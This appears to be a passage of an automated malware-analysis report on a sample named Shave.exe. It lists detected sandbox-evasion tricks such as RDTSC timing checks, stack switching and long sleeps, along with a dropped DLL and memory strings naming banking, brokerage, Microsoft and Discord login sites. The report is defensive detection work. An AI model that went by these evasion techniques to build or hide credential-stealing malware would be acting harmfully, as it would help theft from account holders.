Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Shave.exe API/Special instruction interceptor: Address: 452F7F5
Source: C:\Users\user\Desktop\Shave.exe API/Special instruction interceptor: Address: 319F7F5
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Shave.exe RDTSC instruction interceptor: First address: 44D072A second address: 44D072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8FB9C9Eh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Shave.exe RDTSC instruction interceptor: First address: 314072A second address: 314072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8F000DEh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 35130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 34F10000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598391 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596914 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596677 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596556 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594375 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Shave.exe Window / User API: threadDelayed 8341 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Window / User API: threadDelayed 1497 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Shave.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 2076 Thread sleep count: 8341 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 2076 Thread sleep count: 1497 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596914s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596677s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596556s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00402868 FindFirstFileW, 3_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004065DA FindFirstFileW,FindClose, 3_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598391 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596914 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596677 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596556 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594375 Jump to behavior
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Shave.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Shave.exe API call chain: ExitProcess graph end node
Contains functionality to dynamically determine API calls
